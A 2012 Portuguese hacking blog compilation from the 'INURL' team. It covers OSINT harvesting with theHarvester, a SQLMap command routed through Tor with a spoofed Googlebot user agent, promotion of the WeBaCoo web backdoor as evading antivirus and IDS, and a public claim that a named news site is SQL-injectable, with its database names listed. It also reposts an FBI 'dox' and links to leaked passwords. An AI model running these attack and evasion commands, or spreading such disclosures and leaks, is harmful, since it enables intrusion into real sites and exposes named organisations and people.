sexta-feira, 30 de novembro de 2012

theHarvester: O coletor de informação!





Apresento a vocês hoje uma ferramenta chama the Harvester, o coletor, em português. Quem usa alguma distribuição linux dedicada ao pentest (Backtrack, Bugtraq) já deve ter visto ou usado esse script. O objetivo desse programa escrito em Python é colher e-mails, subdominios, hosts, nomes de empregados, portas abertas e aplicações utilizadas no servidor alvo em diferentes fontes de pesquisa como: Google, Bing, servidores de chaves PGP e bancos de dados Shodan.

Essa ferramenta ajuda os pentesters a entender os footprints dos alvos, e, por consequencia, ajuda os Engenheiros Sociais.

Forma de uso:

$ python theHarvester.py -d seusite.com.br -l 50 -b google

$ python theHarvester.py --help

Explicação:
-d = Define o alvo
-l = Limite de resultados que o motor de pesquisa deve retornar
-b = Motor de pesquisa
--help ou -h = Imprime na tela a ajuda do programa, mostrando outras formas de uso.

Exemplo de resultado:


*************************************
*TheHarvester Ver. 2.2                                  *
*Coded by Christian Martorella                      *
*Edge-Security Research                                *
*cmartorella@edge-security.com                    *
*************************************

[-] Searching in Google:
Searching 0 results...
[+] Emails found:
------------------
*****@vivo.com.br
*****@vivo.com.br
*****@vivo.com.br
[+] Hosts found in search engines:
------------------------------------
123.154.88.000:ficticio.vivo.com.br
123.456.789.1:blablabla.vivo.com.br
000.000.00.0:meuvivolalala.vivo.com.br

Site oficial: www.edge-security.com/theharvester.php
Download: code.google.com/p/theharvester

Os dados são ficticios.

Fica a dica e usem com responsabilidade.

Abraços,

Equipe INURL.

FBI foi invadido pelo grupo CR4WL3RS 294 senhas publicadas

   -- CR4WL3RS --  -- The Hackers Army -- FBI foi invadido pelo grupo CR4WL3RS 294 senhas publicadas
   -- CR4WL3RS --
 -- The Hackers Army --
 
*****************************
Autores:
#CR4WL3RS
#AnonBrazil
#AnonS@mbrio
#TheHackersArmy
 
 
Grupo hacking denominado  "CR4WL3RS", invadio o http://FBI.GOV/ Website Server Dox.

Publicando 294 senhas de usurários.

                          -- http://FBI.GOV/ Website Server Dox --
 
--------------------------------------------------------------------------
935 Pennsylvania Avenue Northwest Washington, DC 20535
(202) 324-3000
 
----------
A_RECORD
----------
Server: 8.8.8.8
Address: 8.8.8.8#53 (node - 53)
 
Canonical name = www.fbi.gov.c.footprint.net.
Name:www.fbi.gov.c.footprint.net
Address: 209.84.4.105
__________
MX_record
----------
Server: 4.2.2.5
Address: 4.2.2.5#53


Referencia: http://pastebin.com/kmNi1kag

terça-feira, 27 de novembro de 2012

Gerando senhas seguras com linux.

Gerando senhas seguras com linux.

Gerando senhas com linux

Instalando:
$sudo apt-get install makepasswd

Uso:
cleiton@drone:~$ makepasswd -char=10 -count=10

"-char=10" = Quantidade de caracteres da senha.
"-count=10" = Quantidade de senhas geradas.

EX:
cleiton@drone:~$ makepasswd -char=10 -count=6
XDfXSyBxvj
yPgR3CTw1u
08Eh5Knxr4
FuYRHjWoDx

be3um05UiX
3nBEdocIY8

segunda-feira, 26 de novembro de 2012

O Dia que o google parou!

Ataques aos sites do Google, Apple e eBay no Paquistão Até 300 sites foram atacados por hackers no Paquistão, incluindo o Google, Apple, eBay e Yahoo, em uma rodada do maior computador na região. Usuários que tentaram entrar nestas páginas foram encontrados com uma foto de dois pingüins em uma ponte com a mensagem "O Paquistão Fallen". Ainda desconhecido o motivo para o ataque, mas


Ataques aos sites do Google, Apple e eBay no Paquistão
Até 300 sites foram atacados por hackers no Paquistão, incluindo o Google, Apple, eBay e Yahoo, em uma rodada do maior computador na região. Usuários que tentaram entrar nestas páginas foram encontrados com uma foto de dois pingüins em uma ponte com a mensagem "O Paquistão Fallen".
Ainda desconhecido o motivo para o ataque, mas

os especialistas dizem que pode ser uma tentativa de mostrar as falhas de segurança da empresa PKNIC, responsável pela gestão do PK no país.

Grupo UgBrazil assumiu autoria dos ataques

http://noticiascl.terra.cl/tecnologia/noticias/0,,OI6332039-EI4130,00-Atacan+paginas+web+de+Google+Apple+y+eBay+en+Pakistan.html

Hacker invade site do exército colombiano e divulga informações



Neste sábado (24) um hacker que se auto-denomina UR0B0R0X divulgou e-mails e suas respectivas senhas pertencentes à cerca de 300 militares do exército da Colômbia.

Não se sabe a vulnerabilidade explorada pelo hacker.

Clique aqui para ver as informações (você será redirecionado para o pastebin).


sexta-feira, 23 de novembro de 2012

Usando ferramenta SQLMap com o Tor

A Injeção de SQL, mais conhecida através do termo americano SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação. A alguns anos atrás quando essa ameaça foi descoberta, a forma de injeção era "na unha", digamos assim. O pentester tinha que inserir os códigos manualmente, demorando muito tempo para concluir o ataque. Foi então que começaram a desenvolver programas que automatizados. Hoje em dia talvez o mais conhecido desses programas seja o SQLMap. O SQLMap é um programa de teste de penetração de código aberto, escrito em Python. Ele tem suporte total aos sistemas de banco de dados: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. Também tem suporte a 6 tipos de técnicas SQL Injection.  O foco desse post hoje é mostrar pra vocês como usar o SQLMap junto com o Tor, para proteção do IP, DNS, etc. No seu linux, digite no terminal:

Injeção de SQL, mais conhecida através do termo americano SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação.
A alguns anos atrás quando essa ameaça foi descoberta, a forma de injeção era "na unha", digamos assim. O pentester tinha que inserir os códigos manualmente, demorando muito tempo para concluir o ataque. Foi então que começaram a desenvolver programas que automatizados. Hoje em dia talvez o mais conhecido desses programas seja o SQLMap. O SQLMap é um programa de teste de penetração de código aberto, escrito em Python. Ele tem suporte total aos sistemas de banco de dados:Também tem suporte a 6 tipos de técnicas SQL Injection. MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

O foco desse post hoje é mostrar pra vocês como usar o SQLMap junto com o Tor, para proteção do IP, DNS, etc. No seu linux, digite no terminal:

$ sudo apt-get install tor tor-geoip

Depois disso, entre na pasta o SQLMap e digite:

./sqlmap.py -u "http://www.seusitevulneravel.com/index.php?cata_id=1" -b -a –tor --check-tor--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

O argumento --tor chama o Tor para ser usado e o --check-tor verifica se o Tor está sendo usado corretamente, caso não esteja, você vai receber uma mensagem de erro em vermelho no terminal. E o User Agent é do googlebot, todos os seus requests no site vão parecer como se fosse o bot do Google fazendo uma visitinha. :)

Por hoje é só, pessoal.

Abraços!

LIVRO: BackTrack 4: Garantindo Segurança pelo Teste de Invasão Dominar a arte de teste de penetração com BackTrack

BackTrack 4: Garantindo Segurança pelo Teste de Invasão Dominar a arte de teste de penetração com BackTrack


BackTrack 4:
Garantindo Segurança pelo Teste de Invasão

Dominar a arte de teste de penetração com BackTrack
Ali Shakeel
Tedi Heriyanto


BackTrack 4: Segurança Garantindo pelo Teste de Invasão
Copyright © 2011 Packt Publishing
Todos os direitos reservados. Nenhuma parte deste livro pode ser reproduzida, armazenada em um
sistema, ou transmitida sob qualquer forma ou por qualquer meio, sem a prévia
a permissão do editor, exceto no caso de breves citações embutidas em
artigos críticos ou comentários.
Todo esforço foi feito na preparação deste livro para garantir a precisão
das informações apresentadas. No entanto, as informações contidas neste livro é
vendidos sem garantia, expressa ou implícita. Nem os autores, nem Packt
Publicação, e seus revendedores e distribuidores poderão ser responsabilizados por quaisquer
danos
causados ou supostamente causados direta ou indiretamente por este livro.
Packt Publishing tem se esforçado para fornecer informações sobre marcas registradas de todos os
empresas e produtos mencionados neste livro através da utilização adequada dos capitais.
No entanto, Packt Publishing não pode garantir a precisão das informações.



Índice

PARTE I: Laboratório de Preparação e Procedimentos de Teste
Capítulo 1: Começando com BackTrack
História
Finalidade BackTrack
Ficando BackTrack
Usando BackTrack
DVD ao vivo
Instalar no disco rígido
Instalação na máquina real
Instalação no VirtualBox
Portable BackTrack
Configurando conexão de rede
Ethernet de configuração
Configuração sem fio
Iniciando o serviço de rede
Atualizando BackTrack
Atualização de aplicativos de software
Atualizando o kernel
Instalação de armas adicionais
Nessus vulnerabilidade scanner
WebSecurify
Personalizando BackTrack
Sumário
Capítulo 2: Metodologia de Testes de Penetração
Tipos de testes de penetração
Caixa-preta de teste
Caixa-branca testes
Avaliação de vulnerabilidade versus testes de penetração
Metodologias de testes de segurança
Open Source Security Testing Metodologia Manual (OSSTMM)
Principais recursos e benefícios
Information Systems Security Assessment Framework (ISSAF)
Principais recursos e benefícios
Open Web Application Security Project (OWASP) Top Ten
Principais recursos e benefícios
Web Application Security Threat Classificação Consortium (WASC-TC)
Principais recursos e benefícios
BackTrack metodologia de testes
Alvo de escopo
Coleta de informações
Target descoberta
Enumerando-alvo
Mapeamento da vulnerabilidade
Engenharia social
Exploração alvo
Escalação de privilégios
Manter o acesso
Documentação e relatórios
A ética


PARTE II: Armory Testers Penetração
Capítulo 3: Target Scoping
Coleta de requisitos do cliente
Necessidades dos clientes forma
Ficha de avaliação de resultados
Preparar o plano de teste
Checklist plano de teste
Perfil de testar limites
Definindo os objetivos de negócios
Gerenciamento de projetos e programação
Sumário
Capítulo 4: Coleta de Informações
Recursos públicos
Recolhimento de documentos
Metagoofil
Informações de DNS
dnswalk
dnsenum
dnsmap
[Ii]Índice
dnsmap em massa
dnsrecon
feroz
As informações de rota
0trace
dmitry
itrace
tcpraceroute
tctrace
Utilizando motores de busca
goorecon
theharvester
All-in-one coleta de informações
Maltego
Documentar as informações
Dradis
Capítulo 5: Target Discovery 109
Introdução 109
  Identificação da máquina alvo 110
     sibilo 110
     arping 111
     arping2 112
     fping 113
     genlist 115
     hping2 116
     hping3 117
     lanmap 118
     nbtscan 119
     nping 121
     onesixtyone 122
     OS fingerprinting 122
     p0f 123
     xprobe2 124
     Sumário 126
Capítulo 6: Target Enumerando
Escaneamento de portas
AutoScan
Netifera
Nmap
Nmap especificação do alvo
[Iii]Índice
Nmap TCP scan opções
Nmap UDP scan opções
Nmap porta especificação
Opções de saída de nmap
Timing opções Nmap
Nmap scripting do motor
Unicornscan
Zenmap
Enumeração de serviço
Amap
Httprint
Httsquash
Enumeração VPN
ike-scan
Sumário
Capítulo 7: Mapeamento de Vulnerabilidade
Tipos de vulnerabilidades
Vulnerabilidade local
Vulnerabilidade remota
Vulnerabilidade taxonomia
Open Vulnerability Assessment System (OpenVAS)
OpenVAS ferramentas integradas de segurança
Cisco análise
Cisco ferramenta de auditoria
Cisco Exploiter Global
Cisco Scanner Passwd
Análise Fuzzy
CAMA
Bunny
JBroFuzz
SMB análise
Impacket Samrdump
Smb4k
Análise SNMP
ADMSnmp
Snmp Enum
Walk SNMP
Análise de aplicação Web
Avaliação de ferramentas de banco de dados
DBPwAudit
Pblind
SQLbrute
[Iv]Índice
SQLiX
SqlMap
SQL Ninja
Ferramentas de avaliação de aplicação
Burp Suite
Grendel Scan
LBD
Nikto2
Paros Proxy
Ratproxy
W3AF
WAFW00F
WebScarab
Capítulo 8: Engenharia Social
Psicologia modelagem humana
Processo de ataque
Métodos de ataque
Representação
Retribuição
Influente autoridade
Escassez
Relacionamento social
Engenharia Social Toolkit (SET)
Ataque de phishing direcionados
Coleta de credenciais do usuário
Usuário comum senhas Profiler (Cupp)
Capítulo 9: Exploração Target
Vulnerabilidade de pesquisa
Repositórios de vulnerabilidade e explorar
Advanced exploração toolkit
Msfconsole
MSFCLI
Ninja 101 brocas
Cenário # 1
Cenário # 2
Cenário # 3
Cenário # 4
Cenário # 5
Escrita módulo de exploração
[V]Índice
Capítulo 10: elevação de privilégios
Atacando a senha
Ferramentas de ataque offline
Rainbowcrack
Samdump2
John
Ophcrack
Crunch
JMJ
Online ferramentas de
BruteSSH
ataque
Hidra
Sniffers de rede 289
Dsniff 290
Hamster 291
Tcpdump 294
Tcpick 295
Wireshark 296
Spoofing ferramentas de rede 298
Arpspoof 298
Ettercap 300
Sumário 304
Capítulo 11: manter o acesso 305
Protocolo de tunelamento
DNS2tcp
Ptunnel
Stunnel4
Procuração
3proxy
Proxychains
End-to-end de conexão
CryptCat
Sbd
Socat
Capítulo 12: Documentação e Relatórios
Documentação e verificação resultados
Tipos de relatórios
Relatório executivo
Relatório de gestão
Relatório técnico
Rede de relatório de testes de penetração (conteúdo de amostra)
[Vi]
Apresentação
Pós procedimentos de teste
Sumário
PARTE III: Munições extra
Apêndice A: Ferramentas Complementares
Vulnerabilidade scanner
NeXpose comunidade edição
Instalação NeXpose
Comunidade NeXpose de partida
Login para NeXpose comunidade
Usando comunidade NeXpose
Web aplicação fingerprinter
WhatWeb
BlindElephant
Rede Ballista
Netcat
Conexão aberta
Banner serviço agarrando
Servidor simples
Transferência de arquivos
Portscanning
Shell Backdoor
Reverse shell
Sumário
Apêndice B: Recursos-chave
Divulgação vulnerabilidade e Tracking
Pagos Programas de Incentivo
Reversa Engenharia de Recursos
Portas de rede

Baixar: http://inurl.com.br/backtrack%204%20garantindo%20seguran%C3%A7a%20pelo%20teste%20de%20invas%C3%A3o.pdf

Dorks ZEROBIN

Dorks ZEROBIN


Dorks ZEROBIN


WeBaCoo (Web Backdoor Cookie)

WeBaCoo (Web Backdoor Cookie)


WeBaCoo (Web Backdoor Cookie) é um backdoor script web-kit, com o objetivo de fornecer uma discrição conexão terminal como sobre HTTP entre cliente e servidor web. É uma ferramenta de exploração post para manter o acesso a um servidor web comprometido.

WeBaCoo foi projetado para operar sob o radar de moderno up-to-datado AV, NIDS, IPS, firewalls de rede e firewalls de aplicativos, provando um mecanismo de cautela para executar comandos no servidor comprometido. A comunicação é feita usando ofuscado campos de cabeçalho HTTP do biscoito de pedidos do cliente válido e respostas HTTP servidor web parente.

O script kit tem dois modos de operação principais: Geração e "Terminal". Usando o modo de geração, o usuário pode criar o código backdoor contendo as cargas PHP. Por outro lado, no modo "terminal" remoto o cliente pode ligar para o servidor comprometido onde o código PHP backdoor foi injetado. A fim de estabelecer o controle remoto "pseudo"-Shell, o usuário deve fornecer o caminho do servidor URL contendo o código injetado.

WeBaCoo é escrito em Perl sob licença GPLv3 e está hospedado no Github. Você pode baixar WeBaCoo por clonagem do repositório:






Baixar:

git clone git://github.com/anestisb/WeBaCoo.git

ou download direto 

https://github.com/anestisb/WeBaCoo/zipball/master
http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

Scanner de range ip Laking Face

Scanner de range ip Lanking Face


Fiz um simples scanner de ip para divulgar o grupo de estudos.
Lacking FACE

Link do grupo:https://www.facebook.com/groups/GdELackingFaces/

link download fonte:http://inurl.com.br/Scanner.zip


Procurar arquivos web com códigos potencialmente malicioso

Procurar arquivos web com códigos potencialmente malicioso


#---------------------------------------------------------------------#
# Procurar arquivos web com códigos potencialmente malicioso #
#---------------------------------------------------------------------#



URL Inspect verifique suas url se estão OFF ou ON

URL Inspect verifique suas url se estão OFF ou ON


Muitas vezes possuímos aquela lista enorme de sites vull mas muitos deles estão off.
O seguinte testador faz isso para você.
Uso:

Dando permissão: chmod +x url_inspect.sh ./url_inspect.sh

./Script.sh  arquivo_com_url  /pasta_dow_resultados

Resultado:

quarta-feira, 21 de novembro de 2012

Site: www.jornaldaciencia.org.br vulnerabilidade

Site: www.jornaldaciencia.org.br vulnerabilidade



+Site: www.jornaldaciencia.org.br
+SQLInjection
+MySQL 5.0 + JSP
+Página de contato: http://www.jornaldaciencia.org.br/contato.jsp
+Available databases [3]:
[*] information_schema
[*] jornaldaciencia1
[*] test

Nada foi modificado, removido ou armazenado.

A equipe INURL enviou um e-mail ao administrador do site.

Juntos por uma internet mais segura!




Perfil do vice-primeiro-ministro de Israel, Silvan Shalom, é invadido por hacktivistas.

Perfil do vice-primeiro-ministro de Israel, Silvan Shalom, é invadido por hacktivistas.

Perfil do vice-primeiro-ministro de Israel, Silvan Shalom, é invadido por hacktivistas.

#OpIsrael
#FreePalestine


As contas do Facebook, Twitter, LinkedIn e YouTube de Israel Vice Premier Silvan Shalom foi alterado e preenchido com atualizações pró-Palestina status. ZCompanyHackingCrew reivindicou a responsabilidade por este último ato de guerra cibernética contra Israel.

O grupo também afirma ter hackeado Shalom de e-mail e extraído de correio pessoal, contatos e documentos. Os hackers anunciou planos para lançar os documentos em breve.

Em Shalom do feed Twitter seqüestrado, o grupo hacker postou chamadas para o protesto contra a "guerra injusta e ocupação", e perguntou: "Quem pode ver para descobrir o horror, as mortes de crianças e pessoas inocentes que tentam proteger suas terras ocupada?"

O ataque cibernético em grande escala sobre o alto funcionário israelense vem poucos dias depois de grupo de hackers Anonymous proeminente vazou a informação pessoal de 5.000 funcionários israelenses.

Fonte:http://rt.com/news/anonymous-hack-israel-vice-prime-minister-200/


segunda-feira, 19 de novembro de 2012

Script para listagem de diretórios em Python




                                 

Este script é escrito em Python. Ele scaneia webservers à procura de diretórios comuns, administrativos e shells em php. O script é bem fácil de ser usado.

Via Terminal entre na pasta onde você extraiu o arquivo e digite (como root):
# python scanner.py

Logo depois vai aparecer a imagem que está nesse post ali em cima.

Logo depois digite a URL desejada. É importante lembrar que precisa especificar se é http ou https, caso o contrário o script não vai funcionar.


Exemplo do menu do script:


Os logs ficam na pasta /logs/.

Esse script foi testado utilizando proxychains no Ubuntu 12.10.

Para download, clique aqui.

Bons estudos!

domingo, 18 de novembro de 2012

Google INURL Troll com força busca de apostilas

Google INURL Troll com força
 
 
Google INURL Troll com força
Apostilas introdutoras.
Basta pesquisa as dorks abaixo no Google.

intext:"logica de programção" ext:pdf
intext:"introdução php" ext:pdf
intext:"introdução java" ext:pdf
intext:"introdução html" ext:pdf
intext:"introdução python" ext:pdf

O resto tudo you you you you you tubiyou! kkk
 "De acordo com sua necessidade mude o teme entre aspas".

quarta-feira, 7 de novembro de 2012

#OpNioBio Material para análise e estudo : NióbioNióbio: O que é? E para que serve?

Material para análise e estudo : NióbioNióbio:    O     que é?  E para que serve?
            
Material para análise e estudo : NióbioNióbio:    O     que é?  E para que serve?                                                 
O nióbio apresenta numerosas aplicações. É usado em alguns aços inoxidáveis e em outras ligas de metais não ferrosos. Estas ligas devido à resistência são geralmente usadas para a fabricação de tubos transportadores de água e petróleo a longas distâncias.
Usado em indústrias nucleares devido a sua baixa captura de nêutrons termais.
Usado em soldas elétricas.
Devido a sua coloração é utilizado, geralmente na forma de liga metálica, para a produção de joias como, por exemplo, os piercings.
Quantidades apreciáveis de nióbio são utilizados em superligas para fabricação de componentes de motores de jatos , subconjuntos de foguetes , ou seja, equipamentos que necessitem altas resistências a combustão. Pesquisas avançadas com este metal foram utilizados no programa Gemini (O Projeto Gemini foi o segundo projeto de exploração espacial realizado pela Nasa, antecedido pelo Projeto Mercury, e ao qual se seguiu o Projeto Apollo. No projeto, realizaram-se diversas pesquisas sobre o comportamento dos tripulantes e as máquinas no espaço, particularmente manobras de acoplamento em órbita terrestre e atividades extra-veiculares,habilidades consideradas importantes para o vôo até a Lua)
O nióbio está sendo avaliado como uma alternativa ao tântalo para a utilização em capacitores.
O nióbio se converte num supercondutor quando reduzido a temperaturas criogênicas. Na pressão atmosférica (e quando puro) , tem a mais alta temperatura crítica entre os elementos supercondutores.Além disso, é um elemento presente em ligas de supercondutores que são do tipo II (como o vanádio e o tecnécio ), significando que atinge a temperatura crítica a temperaturas bem mais altas que os outros.
O nióbio é dotado de elasticidade e flexibilidade que permitem ser moldável.
Estas características oferecem inúmeras aplicações em alguns tipos de aços inoxidáveis e ligas de metais não ferrosos destinados à fabricação de tubulações para o transporte de água e petróleo a longas distâncias por ser um poderoso agente anti-corrosivo, resistente aos ácidos mais agressivos, como os naftênicos.
Fonte:niobiomineriobrasileiro.blogspot.com

A dependência de nióbio é causa de preocupação em Washington e as denúncias do Wikileaks.
Brasil é responsável por 87% das importações americanas do minério - usado até mesmo em projetos espaciais
 A grande dependência do nióbio brasileiro deve explicar, segundo especialistas, a preocupação do governo dos Estados Unidos com relação à segurança das minas do País. O Brasil detém 98% das reservas e 91% da produção mundial do minério, usado para a fabricação de aços especiais.Os Estados Unidos não produzem o minério.
Relatório anual do Serviço Geológico dos Estados Unidos (USGS, na sigla em inglês) aponta que o Brasil tem reservas de 2,9 milhões de toneladas de nióbio, com uma produção acumulada de 57 mil toneladas em 2009. O País foi responsável, no ano passado, por 87% das importações americanas do mineral.
O documento indica que a maior economia do mundo continuará dependente do nióbio brasileiro. "As reservas domésticas (dos Estados Unidos) de nióbio têm baixa qualidade, algumas complexas do ponto de vista geológico, e muitas não são comercialmente recuperáveis", diz o texto, publicado em janeiro. Segunda maior reserva, o Canadá é responsável por apenas 7% da produção mundial.
Procuradas pelo Estado, as empresas responsáveis pelas minas citadas no documento divulgado pela WikiLeaks não se pronunciaram sobre o assunto. A CBMM, do grupo Moreira Salles, e a Anglo American são as duas grandes produtoras de nióbio no País, operadoras das minas de Araxá e de Goiás, respectivamente.
A lista divulgada pela WikiLeaks inclui a produção de minério de ferro pela "mina Rio Tinto", que não tem mais ativos brasileiros nesse segmento. A companhia operava uma mina em Corumbá, no Mato Grosso do Sul, que foi vendida à Vale do Rio Doce. Nenhuma das empresas comentou a inclusão do projeto na lista.


                     O que é A CBMM
 A Companhia Brasileira de Metalurgia e Mineração, do Grupo Moreira Salles, é uma empresa nacional que extrai, processa, fabrica e comercializa produtos à base de nióbio. Uma Conta de Participação nos Lucros entre a estatal CODEMIG e a CBMM garante a exploração racional do depósito de nióbio localizado próximo à cidade de Araxá, em Minas Gerais. O contrato concede 25% de participação nos lucros operacionais da CBMM ao Governo do Estado de Minas Gerais. A CBMM é a única produtora de nióbio com presença em todos os segmentos de mercado. Com subsidiárias na Europa (CBMM Europe BV - Amsterdam), Asia (CBMM Asia Pte - Cingapura) e na América do Norte (Reference Metals Company Inc. - Pittsburgh)
FONTE:http://www.cbmm.com.br

               COMERCIALIZAÇÃO DO NIÓBIO
O comércio internacional do nióbio envolve basicamente a liga ferro-nióbio, seguindo-se com menor participação o óxido, o metal, ligas e outros compostos à base de nióbio. Considerando o seu principal produto a liga ferro-nióbio, a comercialização entre países tem como principais fornecedores o Brasil, respondendo por cerca de 90% da oferta externa, seguindo-se o Canadá. Os principais países consumidores são os EUA, Japão, China e alguns países da Europa Ocidental (Alemanha, Inglaterra, França, Itália, Bélgica e Suécia, além de outros sem posição de destaque). Nos Estados Unidos, principal país importador de ferro nióbio, tem como seus fornecedores o Brasil (82%), seguindo-se o Canadá (9%) e a Estônia (2%), e outros países (7%). Dados preliminares referentes à 2008, informam que as importações de nióbio pelos EUA atingiram 10,5 mil toneladas estimando um consumo aparente da ordem de 9,9 mil t/ano. A indústria do aço responde por cerca de 90% da demanda pelo nióbio, quase que integralmente pela liga ferro–nióbio face às características que empresta à qualidade do aço.   A China deverá assumir a liderança no consumo do nióbio, face aos maciços investimentos realizados em infra-estrutura no país, quer na construção civil, indústria automobilística e petrolífera que elevará a demanda por aços especiais.

              Nióbio,Coltan e a guerra no Congo
              Nas montanhas do leste do Congo, há coltan e nióbio,além de ouro,diamantes,cobre, e estanho. Coltan é a abreviação de colombio-tântalo está localizado nesse solo a aproximadamente três bilhões de anos. Ele é usado para a produção de capacitores de nióbio para lidar com o fluxo elétrico de telefones celulares. Cobalto e urânio são elementos essenciais para a, aeroespacial química nuclear e armas militares. Cerca de 80% das reservas mundiais de coltan estão no Congo.
Pelo controle desses minerais há gerada uma tremenda guerra. Os poderosos das multinacionais querem controlar as mineradoras da região.
Conclusão: "a razão desse genocídio são os minerais buscados pelas corporações" e também estão destruindo a segunda maior area verde depois da Amazônia.
Em 1996, os Estados Unidos patrocinaram uma invasão militar aos "vizinhos" da mineradora,que são as cidades de Ruanda e Uganda. Em seguida, o exército ruandês começou a ganhar mais de US $ 20 milhões por mês a partir de mineração de coltan. Há centenas de relatórios denunciando violações de direitos humanos na região mineira.
As empresas com capacidades tecnológicas transformam coltan no cobiçado pó de tântalo e vendem-no para a Nokia, Motorola, Compaq, Sony e outros fabricantes que usam em telefones celulares e outros dispositivos de tecnologia "de ponta".
Keith Harmon Neve diz que para analisar a geopolítica do Congo e as razões para uma guerra quase sem fim desde 1996, temos de entender o negócio do crime organizado por negociadores multinacionais.
A guerra do Congo recebe investimentos das empresas multinacionais nos Estados Unidos, Alemanha, China e Japão na região. E é apoiado pelas mais poderosas corporações, da Cabot Corporation e Grupo OM, os Estados Unidos, o HC Starck da Alemanha, e Nigncxia, China. Redes criminosas, são preparadas e mantidas por essas multinacionais, através da extorsão, suborno, estupro e assassinatos e obteem benefícios sem precedentes para a mineração do Congo. Até 6 milhões em cobalto-prima que partem diariamente do RDC. No entanto, essas empresas raramente aparecem nos relatórios de direitos humanos.
Caracteres relacionados ao negócio de coltan ter sido muito próximo do governo dos EUA. Sam Bodman foi nomeado pelo presidente Bush em 2004 para ser secretário de Energia. Nicole Seligman foi assessor jurídico de Bill Clinton. Muitos que alcançaram posições de poder no governo de Bill Clinton foram para altos cargos na Sony Corporation. Na parte de negócios de distribuidores de armas norte-americanas, como Simax, e as empresas que fabricam material de guerra para o Pentágono, chamado de "prestadores de Defesa".Foi publicado na capa da revista Time: "Congo: O pedágio culto da guerra  mais mortal do Mundo". É verdade, que o artigo menciona brevemente o coltan e seu uso em telefones celulares e outros aparelhos eletrônicos e que a guerra é uma tragédia horrível, mas não disse nada sobre as atividades de corporações e governos estrangeiros  e o seu enriquecimento por meio da guerra.
O mais cruel de tudo é que a mídia não diz nada sobre como esses conflitos levaram a população Africana a uma vida desumana. Alberto Vazquez Figueroa diz na ABC em 12 de novembro deste ano. Conta o impacto da guerra pelo coltan sobre as crianças. Reproduzimos seus pensamentos, palavras formuladas as perguntas e suas respostas: "As crianças, com idades entre sete e 10 anos, são as principais vítimas da luta pela coltan,elas são muito exploradas, e são "pagos" 25 cêntimos de euro por dia. Estamos de frente para a escravidão do século XXI? Muitas destas crianças são mortas por deslizamentos de terra. Nós não paramos a guerra, porque as grandes empresas e os governos não querem parar,pois se a guerra for paralisada os negócios das multinacionais serão parados também. O Coltan ficará no Congo e as empresas não poderão mais extraí-lo facilmente.Gostaria de acrescentar que a compra de produtos dessas grandes corporações, até mesmo produtos que são de necessidade urgente, fazer-nos cúmplices destes terríveis injustiças e incentivar o sofrimento que eles passam. Sejamos conscientes e comprar o que é realmente necessário, porque "progresso" em que o a esse preço não pode ser motivo de orgulho e não se pode progredir como sociedade se não tivermos um pouco de compaixão.
-Alberto Vázquez Figueroa

   As diversas apilicações do Nióbio e as empresas que o ultilizão.
A aplicação mais importante do nióbio é como elemento de liga para conferir melhoria de propriedades em produtos de aço, especialmente nos aços de alta resistência e baixa liga usados na fabricação de automóveis e de tubulações para transmissão de gás sob alta pressão. Vem a seguir seu emprego em superligas que operam a altas temperaturas em turbinas das aeronaves a jato. O nióbio é também adicionado ao aço inoxidável utilizado em sistema de escapamento dos automóveis, e ainda na produção de ligas supercondutoras de nióbio-titânio usadas na fabricação de magnetos para tomógrafos de ressonância magnética. Encontra aplicação também em cerâmicas eletrônicas e em lentes para câmeras.
Os produtos de aço recebem a classificação de planos e não-planos. Os primeiros são constituídos pelas chapas grossas e finas laminadas a quente e chapas finas laminadas a frio. Dentre os não-planos estão perfis estruturais, trilhos, barras de reforço para concreto, barras para construção mecânica e fio máquina. diversas aplicações do Nióbio O transporte de gás e derivados de petróleo através de tubulações é feito sob alta pressão, o que requer, como item básico, um elevado nível de resistência mecânica dos gasodutos. Os tubos de grande diâmetro para transporte de gás ou petróleo e seus derivados, são fabricados com as chapas grossas, de aço microligado ao nióbio, cuja tenacidade pode evitar a propagação de uma fratura, iniciada por forças externas, como um deslizamento ou um abalo sísmico. Sua boa soldabilidade também facilita a construção do sistema de transmissão. A adição de nióbio nesses aços, ao lado de um rígido controle de sua composição química e de um processamento especial de laminação a quente, lhes confere um excelente nível de tenacidade e resistência mecânica. Os japoneses obtêm bons resultados na produção de tubos com o uso de laminadores de grande potência e com a aplicação de resfriamento acelerado com água após a laminação, utilizando pequenas adições de nióbio. Já nos EUA, esquemas menos severos de laminação são praticados. Portanto, adições maiores de nióbio são usadas para aumentar a resistência mecânica e a tenacidade. Na Europa, algumas siderúrgicas têm investido em laminadores de grande potência e em equipamentos de resfriamento acelerado, enquanto outras tendem a seguir o modelo americano. Seguindo uma tendência mundial em quase todos os setores de atividades, o mercado de tubos de grande diâmetro é hoje globalizado. Cada usuário tem uma especificação própria, que prevê composição química e propriedades mecânicas do produto. As companhias siderúrgicas possuem alguma flexibilidade na definição da composição do aço, procurando atender às nece
ssidades específicas de cada cliente. As especificações permitem o uso de nióbio, vanádio e titânio e, em geral, estabelecem um limite máximo para todos esses três elementos. Entre os principais usuários estão British Gas, Exxon, Gazprom, Norwegian Statoil e Petrobras. Alguns importantes produtores de aços para tubos de grande diâmetro são Berg Pipe, Europipe, Nippon Steel, Oregon Steel, Stelco, Sumitomo e Usiminas. As tiras laminadas a quente são usadas na produção de tubos que requerem boa soldabilidade e tenacidade, e na indústria automotiva, que exige aço de boa conformabilidade. São produzidas em laminadores contínuos de tiras a quente. A indústria naval e as plataformas marítimas constituem outro grande mercado para as chapas grossas microligadas com nióbio. Nesta aplicação é comum o emprego de chapas com mais de 50 mm de espessura. Boa parte das siderúrgicas de âmbito internacional, que produzem aços para tubos de grande diâmetro, atendem também à indústria naval e de construção de plataformas marítimas. Importantes consumidores de chapas para navios são a Hitachi Zosen e a Mitsubishi Heavy Industries, no Japão; a Hyundai Heavy Industries e a Samsung Heavy Industries, na Coréia do Sul. Na Europa, os estaleiros mais importantes estão na Alemanha e na Polônia. 